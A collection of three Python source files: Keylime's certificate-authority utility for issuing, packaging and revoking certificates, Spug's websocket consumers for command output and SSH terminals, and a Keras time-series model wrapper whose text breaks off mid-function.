| source | python |
|---|---|
ca_util.py
|
#!/usr/bin/python3
'''
DISTRIBUTION STATEMENT A. Approved for public release: distribution unlimited.
This material is based upon work supported by the Assistant Secretary of Defense for
Research and Engineering under Air Force Contract No. FA8721-05-C-0002 and/or
FA8702-15-D-0001. Any opinions, findings, conclusions or recommendations expressed in this
material are those of the author(s) and do not necessarily reflect the views of the
Assistant Secretary of Defense for Research and Engineering.
Copyright 2015 Massachusetts Institute of Technology.
The software/firmware is provided to you on an As-Is basis
Delivered to the US Government with Unlimited Rights, as defined in DFARS Part
252.227-7013 or 7014 (Feb 2014). Notwithstanding any copyright notice, U.S. Government
rights in this work are defined by DFARS 252.227-7013 or DFARS 252.227-7014 as detailed
above. Use of this work other than as specifically authorized by the U.S. Government may
violate any copyrights that exist in this work.
'''
import sys
import os
import base64
import argparse
import configparser
import datetime
import getpass
import zipfile
import io
import socket
from keylime import revocation_notifier
import threading
import http.server
from http.server import HTTPServer, BaseHTTPRequestHandler
from socketserver import ThreadingMixIn
import functools
import signal
import time
import yaml
try:
from yaml import CSafeLoader as SafeLoader, CSafeDumper as SafeDumper
except ImportError:
from yaml import SafeLoader as SafeLoader, SafeDumper as SafeDumper
try:
import simplejson as json
except ImportError:
raise("Simplejson is mandatory, please install")
from keylime import crypto
from keylime import cmd_exec
from keylime import common
from keylime import keylime_logging
logger = keylime_logging.init_logging('ca-util')
if common.CA_IMPL=='cfssl':
from keylime import ca_impl_cfssl as ca_impl
elif common.CA_IMPL=='openssl':
from keylime import ca_impl_openssl as ca_impl
else:
raise Exception("Unknown CA implementation: %s"%common.CA_IMPL)
from M2Crypto import X509, EVP, BIO
config = configparser.ConfigParser()
config.read(common.CONFIG_FILE)
"""
Tools for creating a CA cert and signed server certs.
Divined from http://svn.osafoundation.org/m2crypto/trunk/tests/test_x509.py
The mk_temporary_xxx calls return a NamedTemporaryFile with certs.
Usage:
# Create a temporary CA cert and its private key
cacert, cakey = mk_temporary_cacert()
# Create a temporary server cert+key, signed by the CA
server_cert = mk_temporary_cert(cacert.name, cakey.name, '*.server.co.uk')
"""
# protips
# openssl verify -CAfile cacert.crt cacert.crt cert.crt
# openssl x509 -in cert.crt -noout -text
# openssl x509 -in cacert.crt -noout -text
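# A minimal programmatic check mirroring the validation step in cmd_mkcert(),
# assuming cacert.crt and client-cert.crt already exist in the CA working
# directory (illustrative sketch, not executed at import time):
#   from M2Crypto import X509
#   cacert = X509.load_cert('cacert.crt')
#   cert = X509.load_cert('client-cert.crt')
#   cert.verify(cacert.get_pubkey())  # returns 1 when the CA signature checks out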
global_password=None
def globalcb(*args):
global global_password
return global_password.encode()
def setpassword(pw):
global global_password
if len(pw)==0:
raise Exception("You must specify a password!")
global_password = pw
def cmd_mkcert(workingdir,name):
cwd = os.getcwd()
try:
common.ch_dir(workingdir,logger)
priv = read_private()
cacert = X509.load_cert('cacert.crt')
ca_pk = EVP.load_key_string(priv[0]['ca'])
cert,pk = ca_impl.mk_signed_cert(cacert,ca_pk,name,priv[0]['lastserial']+1)
with open('%s-cert.crt'%name, 'wb') as f:
f.write(cert.as_pem())
f = BIO.MemoryBuffer()
pk.save_key_bio(f,None)
priv[0][name]=f.getvalue()
f.close()
#increment serial number after successful creation
priv[0]['lastserial']+=1
write_private(priv)
# write out the private key with password
with os.fdopen(os.open("%s-private.pem"%name,os.O_WRONLY | os.O_CREAT,0o600), 'wb') as f:
biofile = BIO.File(f)
pk.save_key_bio(biofile, 'aes_256_cbc', globalcb)
biofile.close()
pk.get_rsa().save_pub_key('%s-public.pem'%name)
cc = X509.load_cert('%s-cert.crt'%name)
if cc.verify(cacert.get_pubkey()):
logger.info("Created certificate for name %s successfully in %s"%(name,workingdir))
else:
logger.error("ERROR: Cert does not validate against CA")
finally:
os.chdir(cwd)
def cmd_init(workingdir):
cwd = os.getcwd()
try:
common.ch_dir(workingdir,logger)
rmfiles("*.pem")
rmfiles("*.crt")
rmfiles("*.zip")
rmfiles("*.der")
rmfiles("private.yml")
if common.CA_IMPL=='cfssl':
pk_str, cacert, ca_pk, _ = ca_impl.mk_cacert()
elif common.CA_IMPL=='openssl':
cacert, ca_pk, _ = ca_impl.mk_cacert()
else:
raise Exception("Unknown CA implementation: %s"%common.CA_IMPL)
priv=read_private()
# write out keys
with open('cacert.crt', 'wb') as f:
f.write(cacert.as_pem())
f = BIO.MemoryBuffer()
ca_pk.save_key_bio(f,None)
priv[0]['ca']=f.getvalue()
f.close()
# store the last serial number created.
# the CA is always serial # 1
priv[0]['lastserial'] = 1
write_private(priv)
ca_pk.get_rsa().save_pub_key('ca-public.pem')
# generate an empty crl
if common.CA_IMPL=='cfssl':
crl = ca_impl.gencrl([],cacert.as_pem(), pk_str)
elif common.CA_IMPL=='openssl':
crl = ca_impl.gencrl([],cacert.as_pem(),priv[0]['ca'].decode('utf-8'))
else:
raise Exception("Unknown CA implementation: %s"%common.CA_IMPL)
if isinstance(crl, str):
crl = crl.encode('utf-8')
with open('cacrl.der','wb') as f:
f.write(crl)
convert_crl_to_pem("cacrl.der","cacrl.pem")
# Sanity checks...
cac = X509.load_cert('cacert.crt')
if cac.verify():
logger.info("CA certificate created successfully in %s"%workingdir)
else:
logger.error("ERROR: Cert does not self validate")
finally:
os.chdir(cwd)
def cmd_certpkg(workingdir,name,insecure=False):
cwd = os.getcwd()
try:
common.ch_dir(workingdir,logger)
# zip up the crt, private key, and public key
with open('cacert.crt','r') as f:
cacert = f.read()
with open("%s-public.pem"%name,'r') as f:
pub = f.read()
with open("%s-cert.crt"%name,'r') as f:
cert = f.read()
with open('cacrl.der','rb') as f:
crl = f.read()
with open('cacrl.pem','r') as f:
crlpem = f.read()
cert_obj = X509.load_cert_string(cert)
serial = cert_obj.get_serial_number()
subject = str(cert_obj.get_subject())
priv = read_private()
private = priv[0][name]
with open("%s-private.pem"%name,'r') as f:
prot_priv = f.read()
#code to create a pem formatted protected private key using the keystore password
# pk = EVP.load_key_string(str(priv[0][name]))
# f = BIO.MemoryBuffer()
# # globalcb will return the global password provided by the user
# pk.save_key_bio(f, 'aes_256_cbc', globalcb)
# prot_priv = f.getvalue()
# f.close()
# no compression to avoid extraction errors in tmpfs
sf = io.BytesIO()
with zipfile.ZipFile(sf,'w',compression=zipfile.ZIP_STORED) as f:
f.writestr('%s-public.pem'%name,pub)
f.writestr('%s-cert.crt'%name,cert)
f.writestr('%s-private.pem'%name,private)
f.writestr('cacert.crt',cacert)
f.writestr('cacrl.der',crl)
f.writestr('cacrl.pem',crlpem)
pkg = sf.getvalue()
if insecure:
logger.warning("Unprotected private keys in cert package being written to disk")
with open('%s-pkg.zip'%name,'wb') as f:
f.write(pkg)
else:
# actually output the package to disk with a protected private key
with zipfile.ZipFile('%s-pkg.zip'%name,'w',compression=zipfile.ZIP_STORED) as f:
f.writestr('%s-public.pem'%name,pub)
f.writestr('%s-cert.crt'%name,cert)
f.writestr('%s-private.pem'%name,prot_priv)
f.writestr('cacert.crt',cacert)
f.writestr('cacrl.der',crl)
f.writestr('cacrl.pem',crlpem)
logger.info("Creating cert package for %s in %s-pkg.zip"%(name,name))
return pkg,serial,subject
finally:
os.chdir(cwd)
def convert_crl_to_pem(derfile,pemfile):
if config.get('general','ca_implementation')=='openssl':
with open(pemfile,'w') as f:
f.write("")
else:
cmd_exec.run("openssl crl -in %s -inform der -out %s"%(derfile,pemfile),lock=False)
def get_crl_distpoint(cert_path):
cert_obj = X509.load_cert(cert_path)
text= cert_obj.as_text()
incrl=False
distpoint=""
for line in text.split('\n'):
line = line.strip()
if line.startswith("X509v3 CRL Distribution Points:"):
incrl = True
if incrl and line.startswith("URI:"):
distpoint = line[4:]
break
return distpoint
# to check: openssl crl -inform DER -text -noout -in cacrl.der
def cmd_revoke(workingdir,name=None,serial=None):
cwd = os.getcwd()
try:
common.ch_dir(workingdir,logger)
priv = read_private()
if name is not None and serial is not None:
raise Exception("You may not specify a cert and a serial at the same time")
if name is None and serial is None:
raise Exception("You must specify a cert or a serial to revoke")
if name is not None:
# load up the cert
cert = X509.load_cert("%s-cert.crt"%name)
serial = cert.get_serial_number()
#convert serial to string
serial = str(serial)
# get the ca key cert and keys as strings
with open('cacert.crt','r') as f:
cacert = f.read()
ca_pk = priv[0]['ca'].decode('utf-8')
if serial not in priv[0]['revoked_keys']:
priv[0]['revoked_keys'].append(serial)
crl = ca_impl.gencrl(priv[0]['revoked_keys'],cacert,ca_pk)
write_private(priv)
# write out the CRL to the disk
with open('cacrl.der','wb') as f:
f.write(crl)
convert_crl_to_pem("cacrl.der","cacrl.pem")
finally:
os.chdir(cwd)
return crl
# regenerate the crl without revoking anything
def cmd_regencrl(workingdir):
cwd = os.getcwd()
try:
common.ch_dir(workingdir,logger)
priv = read_private()
# get the ca key cert and keys as strings
with open('cacert.crt','r') as f:
cacert = f.read()
ca_pk = priv[0]['ca'].decode('utf-8')
crl = ca_impl.gencrl(priv[0]['revoked_keys'],cacert,ca_pk)
write_private(priv)
# write out the CRL to the disk
with open('cacrl.der','wb') as f:
f.write(crl)
convert_crl_to_pem("cacrl.der","cacrl.pem")
finally:
os.chdir(cwd)
return crl
def cmd_listen(workingdir,cert_path):
cwd = os.getcwd()
try:
common.ch_dir(workingdir,logger)
#just load up the password for later
read_private(True)
serveraddr = ('', common.CRL_PORT)
server = ThreadedCRLServer(serveraddr,CRLHandler)
if os.path.exists('cacrl.der'):
logger.info("Loading existing crl: %s"%os.path.abspath("cacrl.der"))
with open('cacrl.der','rb') as f:
server.setcrl(f.read())
t = threading.Thread(target=server.serve_forever)
logger.info("Hosting CRL on %s:%d"%(socket.getfqdn(),common.CRL_PORT))
t.start()
def check_expiration():
logger.info("checking CRL for expiration every hour")
while True:
try:
if os.path.exists('cacrl.der'):
retout = cmd_exec.run("openssl crl -inform der -in cacrl.der -text -noout",lock=False)['retout']
for line in retout:
line = line.strip()
if line.startswith(b"Next Update:"):
expire = datetime.datetime.strptime(line[13:].decode('utf-8'),"%b %d %H:%M:%S %Y %Z")
# re-issue if the CRL expires within the next 6 hours
expires_soon = datetime.datetime.utcnow()+datetime.timedelta(hours=6)
if expire<=expires_soon:
logger.info("CRL expires soon (%s), re-issuing"%expire)
cmd_regencrl(workingdir)
# check a little less than every hour
time.sleep(3540)
except KeyboardInterrupt:
logger.info("TERM Signal received, shutting down...")
#server.shutdown()
break
t2 = threading.Thread(target=check_expiration)
t2.setDaemon(True)
t2.start()
def revoke_callback(revocation):
json_meta = json.loads(revocation['meta_data'])
serial = json_meta['cert_serial']
if revocation.get('type',None) != 'revocation' or serial is None:
logger.error("Unsupported revocation message: %s"%revocation)
return
logger.info("Revoking certificate: %s"%serial)
server.setcrl(cmd_revoke(workingdir, None, serial))
try:
while True:
try:
revocation_notifier.await_notifications(revoke_callback,revocation_cert_path=cert_path)
except Exception as e:
logger.exception(e)
logger.warning("No connection to revocation server, retrying in 10s...")
time.sleep(10)
except KeyboardInterrupt:
logger.info("TERM Signal received, shutting down...")
server.shutdown()
sys.exit()
finally:
os.chdir(cwd)
class ThreadedCRLServer(ThreadingMixIn, HTTPServer):
published_crl = None
def setcrl(self,crl):
self.published_crl = crl
class CRLHandler(BaseHTTPRequestHandler):
def do_GET(self):
logger.info('GET invoked from ' + str(self.client_address) + ' with uri:' + self.path)
if self.server.published_crl is None:
self.send_response(404)
self.end_headers()
else:
# send back the CRL
self.send_response(200)
self.end_headers()
self.wfile.write(self.server.published_crl)
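# To fetch the CRL published by cmd_listen() from another machine (illustrative;
# substitute the real CA host and the configured CRL port):
#   curl -s http://<ca-host>:<crl-port>/ -o cacrl.der
#   openssl crl -inform DER -text -noout -in cacrl.der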
def rmfiles(path):
import glob
files = glob.glob(path)
for f in files:
os.remove(f)
def write_private(inp):
priv = inp[0]
salt = inp[1]
global global_password
priv_encoded = yaml.dump(priv, Dumper=SafeDumper)
key = crypto.kdf(global_password,salt)
ciphertext = crypto.encrypt(priv_encoded,key)
towrite = {'salt':salt,'priv':ciphertext}
with os.fdopen(os.open('private.yml',os.O_WRONLY | os.O_CREAT,0o600), 'w') as f:
yaml.dump(towrite,f, Dumper=SafeDumper)
def read_private(warn=False):
global global_password
if global_password is None:
setpassword(getpass.getpass("Please enter the password to decrypt your keystore: "))
if os.path.exists('private.yml'):
with open('private.yml','r') as f:
toread = yaml.load(f, Loader=SafeLoader)
key = crypto.kdf(global_password,toread['salt'])
try:
plain = crypto.decrypt(toread['priv'],key)
except ValueError:
raise Exception("Invalid password for keystore")
return yaml.load(plain, Loader=SafeLoader),toread['salt']
else:
if warn:
#file doesn't exist, just invent a salt
logger.warning("Private certificate data %s does not exist yet."%os.path.abspath("private.yml"))
logger.warning("Keylime will attempt to load private certificate data again when it is needed.")
return {'revoked_keys':[]},base64.b64encode(crypto.generate_random_key()).decode()
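# Hedged sketch of the on-disk keystore layout produced by write_private()
# (field names come from the code above; values are illustrative only):
#   private.yml:
#     salt: <base64 salt fed to crypto.kdf together with the user password>
#     priv: <crypto.encrypt() ciphertext of the YAML dump of the private dict,
#            i.e. {'ca': <CA key PEM>, 'lastserial': <int>,
#                  'revoked_keys': [<serials>], '<name>': <per-cert key PEM>}>
# read_private() reverses this and returns the (dict, salt) pair.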
def main(argv=sys.argv):
parser = argparse.ArgumentParser(argv[0])
parser.add_argument('-c', '--command',action='store',dest='command',required=True,help="valid commands are init,create,pkg,revoke,listen")
parser.add_argument('-n', '--name',action='store',help='the common name of the certificate to create')
parser.add_argument('-d','--dir',action='store',help='use a custom directory to store certificates and keys')
parser.add_argument('-i','--insecure',action='store_true',default=False,help='create cert packages with unprotected private keys and write them to disk. USE WITH CAUTION!')
if common.DEVELOP_IN_ECLIPSE and len(argv)==1:
argv=['-c','init']
#argv=['-c','create','-n',socket.getfqdn()]
argv=['-c','create','-n','client']
#argv=['-c','pkg','-n','client']
argv=['-c','revoke','-n','client']
argv=['-c','listen','-d','ca']
else:
argv = argv[1:]
# never prompt for passwords in development mode
if common.DEVELOP_IN_ECLIPSE:
setpassword('default')
args = parser.parse_args(argv)
if args.dir==None:
if os.getuid()!=0 and common.REQUIRE_ROOT:
logger.error("If you don't specify a working directory, this process must be run as root to access %s"%common.WORK_DIR)
sys.exit(-1)
workingdir = common.CA_WORK_DIR
else:
workingdir = args.dir
if args.command=='init':
cmd_init(workingdir)
elif args.command=='create':
if args.name is None:
logger.error("you must pass in a name for the certificate using -n (or --name)")
parser.print_help()
sys.exit(-1)
cmd_mkcert(workingdir,args.name)
elif args.command=='pkg':
if args.name is None:
logger.error("you must pass in a name for the certificate using -n (or --name)")
parser.print_help()
sys.exit(-1)
cmd_certpkg(workingdir,args.name,args.insecure)
elif args.command=='revoke':
if args.name is None:
logger.error("you must pass in a name for the certificate using -n (or --name)")
parser.print_help()
sys.exit(-1)
cmd_revoke(workingdir, args.name)
elif args.command=='listen':
if args.name is None:
args.name = "%s/RevocationNotifier-cert.crt"%workingdir
logger.warning("using default name for revocation cert %s"%args.name)
cmd_listen(workingdir,args.name)
else:
logger.error("Invalid command: %s"%args.command)
parser.print_help()
sys.exit(-1)
if __name__=="__main__":
try:
main()
except Exception as e:
logger.exception(e)
|
consumers.py
|
# Copyright: (c) OpenSpug Organization. https://github.com/openspug/spug
# Copyright: (c) <spug.dev@gmail.com>
# Released under the MIT License.
from channels.generic.websocket import WebsocketConsumer
from django_redis import get_redis_connection
from apps.setting.utils import AppSetting
from apps.account.models import User
from apps.host.models import Host
from threading import Thread
import json
import time
class ExecConsumer(WebsocketConsumer):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.token = self.scope['url_route']['kwargs']['token']
self.rds = get_redis_connection()
def connect(self):
self.accept()
def disconnect(self, code):
self.rds.close()
def get_response(self):
response = self.rds.brpop(self.token, timeout=5)
return response[1] if response else None
def receive(self, **kwargs):
response = self.get_response()
while response:
data = response.decode()
self.send(text_data=data)
response = self.get_response()
self.send(text_data='pong')
class SSHConsumer(WebsocketConsumer):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
kwargs = self.scope['url_route']['kwargs']
self.token = kwargs['token']
self.id = kwargs['id']
self.chan = None
self.ssh = None
def loop_read(self):
while True:
data = self.chan.recv(32 * 1024)
# print('read: {!r}'.format(data))
if not data:
self.close(3333)
break
self.send(bytes_data=data)
def receive(self, text_data=None, bytes_data=None):
data = text_data or bytes_data
if data:
data = json.loads(data)
# print('write: {!r}'.format(data))
resize = data.get('resize')
if resize and len(resize) == 2:
self.chan.resize_pty(*resize)
else:
self.chan.send(data['data'])
def disconnect(self, code):
self.chan.close()
self.ssh.close()
# print('Connection close')
def connect(self):
user = User.objects.filter(access_token=self.token).first()
if user and user.token_expired >= time.time() and user.is_active and user.has_host_perm(self.id):
self.accept()
self._init()
else:
self.close()
def _init(self):
self.send(bytes_data=b'Connecting ...\r\n')
host = Host.objects.filter(pk=self.id).first()
if not host:
self.send(text_data='Unknown host\r\n')
self.close()
return
try:
self.ssh = host.get_ssh(AppSetting.get('private_key')).get_client()
except Exception as e:
self.send(bytes_data=f'Exception: {e}\r\n'.encode())
self.close()
return
self.chan = self.ssh.invoke_shell(term='xterm')
self.chan.transport.set_keepalive(30)
Thread(target=self.loop_read).start()
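# Hedged routing sketch (hypothetical module and URL names, not taken from this
# repository) showing where the 'token' and 'id' kwargs read from
# scope['url_route']['kwargs'] would come from with Django Channels:
#   from django.urls import path
#   websocket_urlpatterns = [
#       path('ws/exec/<str:token>/', ExecConsumer),          # .as_asgi() on Channels 3+
#       path('ws/ssh/<str:token>/<int:id>/', SSHConsumer),   # .as_asgi() on Channels 3+
#   ]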
|
mods_model.py
|
# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Created on Mon Jan 11 13:34:37 2019
@author: giang nguyen
@author: stefan dlugolinsky
"""
import io
import json
import logging
import os
import subprocess
import sys
import tempfile
import time
from zipfile import ZipFile
import joblib
import keras
import numpy as np
import pandas as pd
from keras.callbacks import Callback, EarlyStopping, ModelCheckpoint, TensorBoard
from keras.layers import Bidirectional
from keras.layers import Dense
from keras.layers import Flatten
from keras.layers import Input
from keras.layers import RepeatVector
from keras.layers.convolutional import Conv1D
from keras.layers.convolutional import MaxPooling1D
from keras.layers.recurrent import GRU
from keras.layers.recurrent import LSTM
from keras.models import Model
from keras.optimizers import Adam
from keras.preprocessing.sequence import TimeseriesGenerator
from keras_self_attention import SeqSelfAttention
from multiprocessing import Process
from sklearn.preprocessing import MinMaxScaler
from tcn import TCN
import mods.config as cfg
import mods.utils as utl
def launch_tensorboard(port, logdir):
subprocess.call(['tensorboard',
'--logdir', '{}'.format(logdir),
'--port', '{}'.format(port),
'--host', '0.0.0.0',
'--reload_interval', '300',
'--reload_multifile', 'true'])
# TODO: TF2 problem: https://github.com/keras-team/keras/issues/13353
class mods_model:
# generic
__FILE = 'file'
# model
__MODEL = 'model'
__MULTIVARIATE = 'multivariate'
__SEQUENCE_LEN = 'sequence_len'
__MODEL_DELTA = 'model_delta'
__INTERPOLATE = 'interpolate'
__MODEL_TYPE = 'model_type'
__EPOCHS = 'epochs'
__EPOCHS_PATIENCE = 'epochs_patience'
__BLOCKS = 'blocks'
__STACKED_BLOCKS = 'stacked_blocks'
__STEPS_AHEAD = 'steps_ahead'
__BATCH_SIZE = 'batch_size'
__BATCH_NORMALIZATION = 'batch_normalization'
__DROPOUT_RATE = 'dropout_rate'
__DATA_SELECT_QUERY = 'data_select_query'
__TRAIN_TIME_RANGE = 'train_time_range'
__TEST_TIME_RANGE = 'test_time_range'
__WINDOW_SLIDE = 'window_slide'
__TRAIN_TIME_RANGES_EXCLUDED = 'train_time_ranges_excluded'
__TEST_TIME_RANGES_EXCLUDED = 'test_time_ranges_excluded'
# metrics
__TRAINING_TIME = 'training_time'
# scaler
__SCALER = 'scaler'
# sample data
__SAMPLE_DATA = 'sample_data'
__SEP = 'sep'
__SKIPROWS = 'skiprows'
__SKIPFOOTER = 'skipfooter'
__ENGINE = 'engine'
__USECOLS = 'usecols'
def __init__(self, name):
self.name = name
self.config = None
self.model = None
self.__scaler = None
self.sample_data = None
self.__metrics = {}
self.config = self.__default_config()
# saves the contents of the original file (e.g. file in a zip) into a temp file and runs func over it
def __func_over_tempfile(self, orig_file, func, mode='wb', *args, **kwargs):
# create temp file
_, fname = tempfile.mkstemp()
with open(fname, mode) as tf:
# extract model to the temp file
tf.write(orig_file.read())
# call the func over the temp file
result = func(fname, *args, **kwargs)
# remove the temp file
os.remove(fname)
return result
def __save_bytes_in_zip_as_file(self, zip, filename, binary_data):
if sys.version_info >= (3, 6, 0):
with zip.open(filename, mode='w') as f:
f.write(binary_data)
else:
# create temp file
_, fname = tempfile.mkstemp()
# write data into the temp file
with open(fname, 'wb') as tf:
tf.write(binary_data)
# put the temp file into the zip
zip.write(fname, filename)
# remove the temp file
os.remove(fname)
def __get_sample_data_cfg(self):
if mods_model.__SAMPLE_DATA in self.config:
return self.config[mods_model.__SAMPLE_DATA]
return None
def save(self, file):
if not file.lower().endswith('.zip'):
file += '.zip'
logging.info('Saving model: %s' % file)
with ZipFile(file, mode='w') as zip:
self.__save_config(zip, 'config.json')
self.__save_model(zip, self.config[mods_model.__MODEL])
self.__save_scaler(zip, self.config[mods_model.__SCALER])
# self.__save_sample_data(zip, self.__get_sample_data_cfg())
self.__save_metrics(zip, 'metrics.json')
zip.close()
logging.info('Model saved')
return file
def load(self, file):
if not file.lower().endswith('.zip'):
file += '.zip'
logging.info('Loading model: %s' % file)
# -->
# TODO: workaround for https://github.com/keras-team/keras/issues/13353
import keras.backend.tensorflow_backend as tb
tb._SYMBOLIC_SCOPE.value = True
# <--
with ZipFile(file) as zip:
self.__load_config(zip, 'config.json')
self.__load_model(zip, self.config[mods_model.__MODEL])
self.__load_scaler(zip, self.config[mods_model.__SCALER])
# self.__load_sample_data(zip, self.__get_sample_data_cfg())
self.__load_metrics(zip, 'metrics.json')
zip.close()
logging.info('Model loaded')
self.__init()
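# Archive layout handled by save()/load() above (file names come from
# __default_config() further below):
#   config.json  - model configuration dict
#   model.h5     - the keras model (keras.models.save/load_model)
#   scaler.pkl   - the MinMaxScaler, (de)serialized with joblib
#   metrics.json - training metrics (e.g. training_time)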
def __save_config(self, zip, file):
data = json.dumps(self.config)
binary_data = bytes(data, 'utf-8')
self.__save_bytes_in_zip_as_file(zip, file, binary_data)
def __load_config(self, zip, file):
logging.info('Loading model config')
with zip.open(file) as f:
data = f.read()
self.config = json.loads(data.decode('utf-8'))
logging.info('Model config:\n%s' % json.dumps(self.config, indent=True))
def __save_metrics(self, zip, file):
data = json.dumps(self.__metrics)
binary_data = bytes(data, 'utf-8')
self.__save_bytes_in_zip_as_file(zip, file, binary_data)
def __load_metrics(self, zip, file):
logging.info('Loading model metrics')
try:
with zip.open(file) as f:
data = f.read()
self.__metrics = json.loads(data.decode('utf-8'))
logging.info('Model metrics:\n%s' % json.dumps(self.__metrics, indent=True))
except Exception as e:
logging.info('Error: Could not load model metrics [%s]' % str(e))
def __save_model(self, zip, model_config):
logging.info('Saving keras model')
_, fname = tempfile.mkstemp()
self.model.save(fname)
zip.write(fname, model_config[mods_model.__FILE])
os.remove(fname)
logging.info('Keras model saved')
def __load_model(self, zip, model_config):
logging.info('Loading keras model')
with zip.open(model_config[mods_model.__FILE]) as f:
self.model = self.__func_over_tempfile(f, keras.models.load_model)
logging.info('Keras model loaded')
def __save_scaler(self, zip, scaler_config):
logging.info('Saving scaler')
_, fname = tempfile.mkstemp()
joblib.dump(self.__scaler, fname)
zip.write(fname, scaler_config[mods_model.__FILE])
os.remove(fname)
logging.info('Scaler saved')
def __load_scaler(self, zip, scaler_config):
logging.info('Loading scaler')
with zip.open(scaler_config[mods_model.__FILE]) as f:
self.__scaler = joblib.load(f)
logging.info('Scaler loaded')
def __save_sample_data(self, zip, sample_data_config):
if sample_data_config is None:
return
if self.sample_data is None:
logging.info('No sample data was set')
return
logging.info('Saving sample data')
with zip.open(sample_data_config[mods_model.__FILE], mode='w') as f:
self.sample_data.to_csv(
io.TextIOWrapper(f),
sep=sample_data_config[mods_model.__SEP],
skiprows=sample_data_config[mods_model.__SKIPROWS],
skipfooter=sample_data_config[mods_model.__SKIPFOOTER],
engine=sample_data_config[mods_model.__ENGINE],
usecols=lambda col: col in sample_data_config[mods_model.__USECOLS]
)
logging.info('Sample data saved:\n%s' % self.sample_data)
def __load_sample_data(self, zip, sample_data_config):
if sample_data_config is None:
return
logging.info('Loading sample data')
try:
with zip.open(sample_data_config[mods_model.__FILE]) as f:
self.sample_data = pd.read_csv(
io.TextIOWrapper(f),
sep=sample_data_config[mods_model.__SEP],
skiprows=sample_data_config[mods_model.__SKIPROWS],
skipfooter=sample_data_config[mods_model.__SKIPFOOTER],
engine=sample_data_config[mods_model.__ENGINE],
usecols=lambda col: col in sample_data_config[mods_model.__USECOLS]
)
logging.info('Sample data loaded:\n%s' % self.sample_data)
except Exception as e:
logging.info('Sample data not loaded: %s' % e)
def load_data(
self,
path,
sep='\t',
skiprows=0,
skipfooter=0,
engine='python',
usecols=lambda col: col in ['number_of_conn', 'sum_orig_kbytes'],
header=0
):
logging.info(path)
df = pd.read_csv(
open(path),
sep=sep,
skiprows=skiprows,
skipfooter=skipfooter,
engine=engine,
usecols=usecols,
header=header
)
return df
def __default_config(self):
return {
mods_model.__MODEL: {
mods_model.__FILE: 'model.h5',
mods_model.__SEQUENCE_LEN: cfg.sequence_len,
mods_model.__MODEL_DELTA: cfg.model_delta,
mods_model.__INTERPOLATE: cfg.interpolate,
mods_model.__MODEL_TYPE: cfg.model_type,
mods_model.__EPOCHS: cfg.num_epochs,
mods_model.__EPOCHS_PATIENCE: cfg.epochs_patience,
mods_model.__BLOCKS: cfg.blocks,
mods_model.__STACKED_BLOCKS: cfg.stacked_blocks,
mods_model.__STEPS_AHEAD: cfg.steps_ahead,
mods_model.__BATCH_SIZE: cfg.batch_size,
mods_model.__BATCH_NORMALIZATION: cfg.batch_normalization,
mods_model.__DROPOUT_RATE: cfg.dropout_rate,
},
mods_model.__SCALER: {
mods_model.__FILE: 'scaler.pkl'
}
}
def cfg_model(self):
return self.config[mods_model.__MODEL]
def set_multivariate(self, multivariate):
self.cfg_model()[mods_model.__MULTIVARIATE] = multivariate
def get_multivariate(self):
return self.cfg_model()[mods_model.__MULTIVARIATE]
def set_sequence_len(self, sequence_len):
self.cfg_model()[mods_model.__SEQUENCE_LEN] = sequence_len
def get_sequence_len(self):
return self.cfg_model()[mods_model.__SEQUENCE_LEN]
def set_model_delta(self, model_delta):
self.cfg_model()[mods_model.__MODEL_DELTA] = model_delta
def is_delta(self):
return self.cfg_model()[mods_model.__MODEL_DELTA]
def set_interpolate(self, interpolate):
self.cfg_model()[mods_model.__INTERPOLATE] = interpolate
def get_interpolate(self):
return self.cfg_model()[mods_model.__INTERPOLATE]
def set_model_type(self, model_type):
self.cfg_model()[mods_model.__MODEL_TYPE] = model_type
def get_model_type(self):
return self.cfg_model()[mods_model.__MODEL_TYPE]
def set_epochs(self, epochs):
self.cfg_model()[mods_model.__EPOCHS] = epochs
def get_epochs(self):
return self.cfg_model()[mods_model.__EPOCHS]
def set_epochs_patience(self, epochs_patience):
self.cfg_model()[mods_model.__EPOCHS_PATIENCE] = epochs_patience
def get_epochs_patience(self):
return self.cfg_model()[mods_model.__EPOCHS_PATIENCE]
def set_blocks(self, blocks):
self.cfg_model()[mods_model.__BLOCKS] = blocks
def get_blocks(self):
return self.cfg_model()[mods_model.__BLOCKS]
def set_stacked_blocks(self, stacked_blocks):
self.cfg_model()[mods_model.__STACKED_BLOCKS] = stacked_blocks
def get_stacked_blocks(self):
return self.cfg_model()[mods_model.__STACKED_BLOCKS]
def set_steps_ahead(self, steps_ahead):
self.cfg_model()[mods_model.__STEPS_AHEAD] = steps_ahead
def get_steps_ahead(self):
return self.cfg_model()[mods_model.__STEPS_AHEAD]
def set_batch_size(self, batch_size):
self.cfg_model()[mods_model.__BATCH_SIZE] = batch_size
def get_batch_size(self):
return self.cfg_model()[mods_model.__BATCH_SIZE]
def set_batch_normalization(self, batch_normalization):
self.cfg_model()[mods_model.__BATCH_NORMALIZATION] = batch_normalization
def get_batch_normalization(self):
return self.cfg_model()[mods_model.__BATCH_NORMALIZATION]
def set_dropout_rate(self, dropout_rate):
self.cfg_model()[mods_model.__DROPOUT_RATE] = dropout_rate
def get_dropout_rate(self):
return self.cfg_model()[mods_model.__DROPOUT_RATE]
def set_data_select_query(self, data_select_query):
self.cfg_model()[mods_model.__DATA_SELECT_QUERY] = data_select_query
def get_data_select_query(self):
return self.cfg_model()[mods_model.__DATA_SELECT_QUERY]
def set_train_time_range(self, train_time_range):
self.cfg_model()[mods_model.__TRAIN_TIME_RANGE] = train_time_range.to_str()
def get_train_time_range(self):
return self.cfg_model()[mods_model.__TRAIN_TIME_RANGE].from_str()
def set_test_time_range(self, test_time_range):
self.cfg_model()[mods_model.__TEST_TIME_RANGE] = test_time_range.to_str()
def get_test_time_range(self):
return self.cfg_model()[mods_model.__TEST_TIME_RANGE].from_str()
def set_window_slide(self, window_slide):
self.cfg_model()[mods_model.__WINDOW_SLIDE] = window_slide
def get_window_slide(self):
return self.cfg_model()[mods_model.__WINDOW_SLIDE]
def set_train_time_ranges_excluded(self, train_time_ranges_excluded):
try:
train_time_ranges_excluded = [r.to_str() for r in train_time_ranges_excluded]
except Exception as e:
